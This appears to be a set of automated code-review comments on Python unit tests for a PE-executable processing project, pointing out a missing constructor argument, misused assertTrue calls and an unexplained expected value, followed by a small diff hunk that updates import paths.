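Review bot: `exe_host = ExeHost()` calls the constructor without the `filepath` argument that the new `ExeHost.__init__(self, filepath: FilePath)` in model/exehost.py requires, so this test now fails with `TypeError` before `fixup_iat_reuse` runs; since `init()` is never called here and `fixup_iat_reuse` only uses `add_iat_resolve`/`iat_resolves`, a placeholder path such as `exe_host = ExeHost("")` is enough. `self.assertTrue(len(exe_host.iat_resolves), 2)` and the `.id` length assertion below it pass for any non-zero length, because the second argument of `assertTrue` is the failure message, not an expected value; use `self.assertEqual(len(exe_host.iat_resolves), 2)` and `self.assertEqual(len(exe_host.iat_resolves["GetEnvironmentVariableW"].id), 6)`. The test method continues past the end of the hunk.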
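Review bot: The comment `# needs to be 7!` on the changed assertion records the new expected length without saying where 7 comes from, so the next change to the producer will not know to update it; name the source, e.g. `# must match the randbytes length produced by the data-reuse fixup (presumably in phases.datareuse)`. The two `assertTrue(fixup[...], "rcx")`/`"$SG72513"` lines above it have the same message-instead-of-expected-value problem as tests/test_asm.py and should be `assertEqual`. The enclosing test method starts before the hunk.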
@@ -3,8 +3,8 @@ from typing import List
 import unittest
 import logging
-from model import ExeInfo
-from defs import *
+from model.exehost import ExeHost
+from model.defs import *
 from pehelper import extract_code_from_exe
 from helper import hexdump
 from observer import observer